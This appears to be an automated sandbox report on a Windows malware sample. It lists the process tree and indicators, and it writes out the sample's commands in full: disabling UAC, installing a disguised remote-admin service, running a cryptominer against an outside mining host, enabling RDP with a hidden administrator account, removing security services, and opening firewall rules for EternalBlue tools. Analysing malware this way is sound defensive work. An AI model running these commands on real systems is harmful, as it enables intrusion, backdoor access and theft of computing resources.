winit.exerutserv.exerutserv.exerutserv.exerutserv.exeWinMail.exeWinMail.exetaskhost.exetaskhostw.exewinlogon.exeR8.exeaudiodg.exeMicrosoftHost.exepid process 804 winit.exe 1188 rutserv.exe 1392 rutserv.exe 1604 rutserv.exe 2012 rutserv.exe 4628 WinMail.exe 4600 WinMail.exe 3108 taskhost.exe 3952 taskhostw.exe 1140 winlogon.exe 836 R8.exe 5388 audiodg.exe 5536 MicrosoftHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
LtHv0O2KZDK4M637.bin.exewini.exeWScript.execmd.exerutserv.exesys.execmd.exewinit.exeWinMail.exedescription pid process target process PID 4640 wrote to memory of 3460 4640 LtHv0O2KZDK4M637.bin.exe wini.exe PID 4640 wrote to memory of 3460 4640 LtHv0O2KZDK4M637.bin.exe wini.exe PID 4640 wrote to memory of 3460 4640 LtHv0O2KZDK4M637.bin.exe wini.exe PID 3460 wrote to memory of 4208 3460 wini.exe WScript.exe PID 3460 wrote to memory of 4208 3460 wini.exe WScript.exe PID 3460 wrote to memory of 4208 3460 wini.exe WScript.exe PID 3460 wrote to memory of 804 3460 wini.exe winit.exe PID 3460 wrote to memory of 804 3460 wini.exe winit.exe PID 3460 wrote to memory of 804 3460 wini.exe winit.exe PID 4208 wrote to memory of 4072 4208 WScript.exe cmd.exe PID 4208 wrote to memory of 4072 4208 WScript.exe cmd.exe PID 4208 wrote to memory of 4072 4208 WScript.exe cmd.exe PID 4072 wrote to memory of 3164 4072 cmd.exe regedit.exe PID 4072 wrote to memory of 3164 4072 cmd.exe regedit.exe PID 4072 wrote to memory of 3164 4072 cmd.exe regedit.exe PID 4072 wrote to memory of 576 4072 cmd.exe regedit.exe PID 4072 wrote to memory of 576 4072 cmd.exe regedit.exe PID 4072 wrote to memory of 576 4072 cmd.exe regedit.exe PID 4072 wrote to memory of 668 4072 cmd.exe timeout.exe PID 4072 wrote to memory of 668 4072 cmd.exe timeout.exe PID 4072 wrote to memory of 668 4072 cmd.exe timeout.exe PID 4072 wrote to memory of 1188 4072 cmd.exe rutserv.exe PID 4072 wrote to memory of 1188 4072 cmd.exe rutserv.exe PID 4072 wrote to memory of 1188 4072 cmd.exe rutserv.exe PID 4072 wrote to memory of 1392 4072 cmd.exe rutserv.exe PID 4072 wrote to memory of 1392 4072 cmd.exe rutserv.exe PID 4072 wrote to memory of 1392 4072 cmd.exe rutserv.exe PID 4072 wrote to memory of 1604 4072 cmd.exe rutserv.exe PID 4072 wrote to memory of 1604 4072 cmd.exe rutserv.exe PID 4072 wrote to memory of 1604 4072 cmd.exe rutserv.exe PID 4640 wrote to memory of 1728 4640 LtHv0O2KZDK4M637.bin.exe sys.exe PID 4640 wrote to memory of 1728 4640 LtHv0O2KZDK4M637.bin.exe sys.exe PID 4640 wrote to memory of 1728 4640 LtHv0O2KZDK4M637.bin.exe sys.exe PID 2012 wrote to memory of 2088 2012 rutserv.exe rfusclient.exe PID 2012 wrote to memory of 2088 2012 rutserv.exe rfusclient.exe PID 2012 wrote to memory of 2088 2012 rutserv.exe rfusclient.exe PID 2012 wrote to memory of 4300 2012 rutserv.exe rfusclient.exe PID 2012 wrote to memory of 4300 2012 rutserv.exe rfusclient.exe PID 2012 wrote to memory of 4300 2012 rutserv.exe rfusclient.exe PID 4072 wrote to memory of 4440 4072 cmd.exe attrib.exe PID 4072 wrote to memory of 4440 4072 cmd.exe attrib.exe PID 4072 wrote to memory of 4440 4072 cmd.exe attrib.exe PID 4072 wrote to memory of 4416 4072 cmd.exe attrib.exe PID 4072 wrote to memory of 4416 4072 cmd.exe attrib.exe PID 4072 wrote to memory of 4416 4072 cmd.exe attrib.exe PID 4072 wrote to memory of 4428 4072 cmd.exe sc.exe PID 4072 wrote to memory of 4428 4072 cmd.exe sc.exe PID 4072 wrote to memory of 4428 4072 cmd.exe sc.exe PID 4072 wrote to memory of 2292 4072 cmd.exe sc.exe PID 4072 wrote to memory of 2292 4072 cmd.exe sc.exe PID 4072 wrote to memory of 2292 4072 cmd.exe sc.exe PID 4072 wrote to memory of 2548 4072 cmd.exe sc.exe PID 4072 wrote to memory of 2548 4072 cmd.exe sc.exe PID 4072 wrote to memory of 2548 4072 cmd.exe sc.exe PID 1728 wrote to memory of 3080 1728 sys.exe cmd.exe PID 1728 wrote to memory of 3080 1728 sys.exe cmd.exe PID 1728 wrote to memory of 3080 1728 sys.exe cmd.exe PID 3080 wrote to memory of 3868 3080 cmd.exe timeout.exe PID 3080 wrote to memory of 3868 3080 cmd.exe timeout.exe PID 3080 wrote to memory of 3868 3080 cmd.exe timeout.exe PID 804 wrote to memory of 4628 804 winit.exe WinMail.exe PID 804 wrote to memory of 4628 804 winit.exe WinMail.exe PID 804 wrote to memory of 4628 804 winit.exe WinMail.exe PID 4628 wrote to memory of 4600 4628 WinMail.exe WinMail.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
LtHv0O2KZDK4M637.bin.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" LtHv0O2KZDK4M637.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" LtHv0O2KZDK4M637.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System LtHv0O2KZDK4M637.bin.exe -
Views/modifies file attributes 1 TTPs 31 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 4748 attrib.exe 5232 attrib.exe 5444 attrib.exe 520 attrib.exe 1248 attrib.exe 5372 attrib.exe 4896 attrib.exe 5884 attrib.exe 5868 attrib.exe 4440 attrib.exe 4416 attrib.exe 4740 attrib.exe 2476 attrib.exe 5304 attrib.exe 516 attrib.exe 4668 attrib.exe 4384 attrib.exe 5308 attrib.exe 3276 attrib.exe 6064 attrib.exe 5508 attrib.exe 4656 attrib.exe 5200 attrib.exe 4568 attrib.exe 4352 attrib.exe 5656 attrib.exe 6004 attrib.exe 1688 attrib.exe 5300 attrib.exe 5256 attrib.exe 3984 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.bin.exe"C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.bin.exe"1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies WinLogon
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"5⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10005⤵
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own5⤵
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"5⤵
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Windows Mail\WinMail.exe"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE4⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE5⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
-
C:\ProgramData\install\sys.exeC:\ProgramData\install\sys.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 34⤵
- Delays execution with timeout.exe
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui2⤵
- Executes dropped EXE
-
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns5⤵
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns6⤵
- Gathers network information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force5⤵
-
C:\Windows\system32\gpupdate.exegpupdate /force6⤵
-
C:\ProgramData\WindowsTask\audiodg.exeC:\ProgramData\WindowsTask\audiodg.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeC:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://fontdrvhost.ru:3333 -u CPU --donate-level=1 -k -t15⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)5⤵
- Modifies file permissions
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "6⤵
- Modifies registry class
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "8⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f9⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f9⤵
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow9⤵
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add10⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add10⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o9⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow10⤵
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f9⤵
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited10⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"9⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc4⤵
-
C:\Windows\SysWOW64\sc.exesc start appidsvc5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt4⤵
-
C:\Windows\SysWOW64\sc.exesc start appmgmt5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice4⤵
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice4⤵
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice4⤵
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice4⤵
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer4⤵
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle4⤵
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_644⤵
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_645⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql4⤵
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.2554⤵
-
